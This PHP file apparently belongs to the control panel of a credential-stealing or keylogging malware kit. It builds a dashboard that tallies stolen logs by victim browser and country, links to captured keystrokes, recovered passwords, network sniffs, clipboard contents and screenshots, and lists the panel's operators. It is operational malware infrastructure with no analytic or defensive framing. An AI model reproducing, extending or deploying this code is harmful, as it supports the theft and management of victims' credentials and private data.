<?php
//SHOW DASHBOARD///////////////////////////////////////////////////////////////////////
function ShowDashboard($fb)
{
    $html = topTable($fb);
    
    $misc = $fb->panel->str['misc'];
    $html .= "<table width='100%' border='0'> <tr><td valign='top'>
        <div class='row'>
            <div class='col-md-12'>
                <div class='panel panel-default'>
                    <div class='panel-heading'><h2><strong>".$misc['flogsinfo']."</strong></h2></div>
                    <div class='panel-body'>
                    <table class='table bootstrap-datatable countries'>
                    <thead> <tr><th width='64px'>".$misc['flag']."</th><th style='text-align:center;'>
                    ".$misc['ccode']."</th><th>".$misc['cname']."</th><th style='text-align:center;'>".
                    $misc['numoflogs']."</th><th>".$misc['percent']."</th><th>".$misc['range'].
                    "</th></th><th width='5px'></th></tr></thead><tbody>".logLines($fb)."</tbody>
                    </table>
                    </div>
                </div>
            </div>
        </div>
        </td>
        <td width='4%'></td>
        <td width='25%' valign='top'>
        <div class='row'>
            <div class='col-md-12'>
                <div class='panel panel-default'>
                    <div class='panel-heading'><h2><strong>".$misc['cpuser']."</strong></h2></div>
                    <div class='panel-body'>
                    <table class='table bootstrap-datatable countries'>
                    <thead> <tr><th valign='top'>".$misc['user']."</th><th width='25%'>".
                    $misc['privilege']."</th><th>".$misc['lastlogin']."</th></tr></thead>
                    <tbody>".logusers($fb)."</tbody>
                    </table>
                    </div>
                </div>
            </div>
        </div>
        </td></tr></table>";
    
    mysqli_close($fb->mysql);//Debuger Bug in SqliDriver not fixable..
    show($fb->panel->str['bodyHeader'].$html.$fb->str['footer']."</div>", $fb->panel->str['pageHead']['dashboard']);
}

function topTable($fb)
{
    getClients_str($fb);
    getBrowsers_str($fb);
    getCountries_str($fb);
    $fb->panel->png = getPNGs();
    $fb->panel->str['misc'] = misc_str();
    
    $imb = "<img src='script/img/browser/fb_";
    $im1 = "<td>".$imb;
    $im2 = "<td bgcolor='#e8e8e8'>".$imb;
    $text1 = "<div align='center'>";
    $text2 = " ".$fb->panel->str['misc']['logs']."</div><div style='font-weight:bold; color: #5e5e5e; align=center;'>";
    $loglink = " align='left' alt=''><a href='?action=logs'>";
    $cimg = "<td><img src='script/img/clients/";
    $cend = ".png' alt=''></td>";
    
    $html = "<table class='table-bordered' width='100%' border='0'> <tr>";
    for ($i = 0, $k = 0; $i < count($fb->panel->str['Browsers']); $i++, $k++)
    {
        if( $i && ($i%9)==0 ) { $html .= "</tr> <tr>"; }
        $bg = ($k%2) ? $im1 : $im2;
        
        $html .= $bg.$fb->panel->str['Browsers'][$i].".png'".$loglink.$text1.
                numOfLog($fb->mysql,$i).$text2.$fb->panel->str['Browsers'][$i]."</div> </a> </td>";
    }
    $html .= "</tr></table> <table class='table-bordered' width='100%' border='0'><tr><td bgcolor='#5E5E5E' width='35%'>
            <table width='100%' border='1' bordercolor='#323232'> <tr>";
    
    for ($i = 0; $i < count($fb->panel->str['Clients']); $i++)
    {
        if( $i && ($i%11)==0 ) { $html .= "</tr> <tr>"; }
        $html .= $cimg.$fb->panel->str['Clients'][$i].$cend;
    }
    $html .= "</tr></table> </td>";
           
    $page = array("logs","keystrokes","recoveries","sniffs","clipboard","junk","screenshots");
    for ($i = 0; $i < count($page); $i++)
    {
        $html .= " <td bgcolor='#5E5E5E'> <a href='?action=".$page[$i].
                "'><p class='txcount' align='center'>".numOfKeys($fb->mysql,$page[$i]).
                "</p><div class='txcount2'>".$fb->panel->str['pageHead'][$page[$i]].
                "</div> <p align='center'>".$fb->panel->png[$page[$i]]."</p></a></td>";
    }
    $html .= "</tr></table><p></p><p></p>";
    return $html;
}

function logLines($fb)
{
    $html = '';
    $numOfRow = 0;
    $TotalNum = 0;
    $Percentage = 0;
    $all = mysqli_query($fb->mysql, "SELECT * FROM logs");
    if( $all ) { 
        $TotalNum = mysqli_num_rows($all); 
    }
    
    for ($i = 0; $i < 247; $i++)
    {
        $result = mysqli_query($fb->mysql, "SELECT * FROM `logs` WHERE countryNumber = '".$i."';");
        if( $result && mysqli_num_rows($result) ) 
        { 
            $numOfRow = mysqli_num_rows($result);
            $Percentage = number_format( ($numOfRow/$TotalNum) * 100, 1);
            $html .= "<tr><td><img src='script/img/flags/".
                    strtolower($fb->panel->str['CountryCode'][$i]).".gif";
            $html .= "' width='24' height='16' alt=''></td>";
            $html .= "<td style='text-align:center;'>".$i."</td>";
            $html .= "<td>".$fb->panel->str['CountryName'][$i]."</td>";
            $html .= "<td style='text-align:center;'>".$numOfRow."</td>";
            $html .= "<td>".$Percentage."%</td>";
            
            $html .= "<td> <div class='progress thin'>
            <div class='progress-bar progress-bar-danger' role='progressbar' 
            aria-valuenow='73' aria-valuemin='0' aria-valuemax='100' style='width: ".$Percentage."%'>
            </div> <div class='progress-bar progress-bar-warning' role='progressbar' 
            aria-valuenow='27' aria-valuemin='0' aria-valuemax='100' style='width: ". (100 - $Percentage) ."%'></div>
            </div> <span class='sr-only'>73%</span></td>";
            $html .= "<td></td></tr>";//for right pad issue
        }
    }
    return $html;
}

function logusers($fb)
{
    $userlist = '';
    $cred_result = mysqli_query($fb->mysql, "SELECT * FROM cred");
    
    if( $cred_result )
    {
        while( $row = mysqli_fetch_array($cred_result) )
        {
            $logtime = 'null';
            if( isset($row["logtime"]) ) { $logtime = $row["logtime"]; }
            $userlist .= "<tr><td>".$fb->account['user']."</td><td>".$fb->panel->str['misc']['admin'].
                        "</td><td>".$logtime."</td></tr>";
        }
    }
    
    $user_result = mysqli_query($fb->mysql, "SELECT * FROM users");
    if( $user_result )
    {
        while( $row = mysqli_fetch_array($user_result) )
        {
            $logtime = 'null';
            $privilege = 'null';
            if( isset($row["logtime"]) ) { $logtime = $row["logtime"]; }
            if( isset($row["privilege"]) ) 
            { 
                switch($row["privilege"])
                {
                    case 1:
                    $privilege = $fb->panel->str['misc']['guest']; break;
                    case 2:
                    $privilege = $fb->panel->str['misc']['normal']; break;
                    case 3:
                    $privilege = $fb->panel->str['misc']['admin']; break;
                }
            }
            $userlist .= "<tr><td>".$row["user"]."</td><td>".$privilege."</td><td>".$logtime."</td></tr>";
        }
    }
    return $userlist;
}

function numOfLog($mysql, $num)
{
    $result = mysqli_query($mysql, "SELECT * FROM `logs` WHERE browser = '".$num."';");
    if( $result ) { 
        return mysqli_num_rows($result); 
    }
    return 0;
}
function numOfKeys($mysql, $type )
{
    $result = mysqli_query($mysql, "SELECT * FROM ".$type);
    if( $result ) { 
        return mysqli_num_rows($result); 
    }
    return 0;
}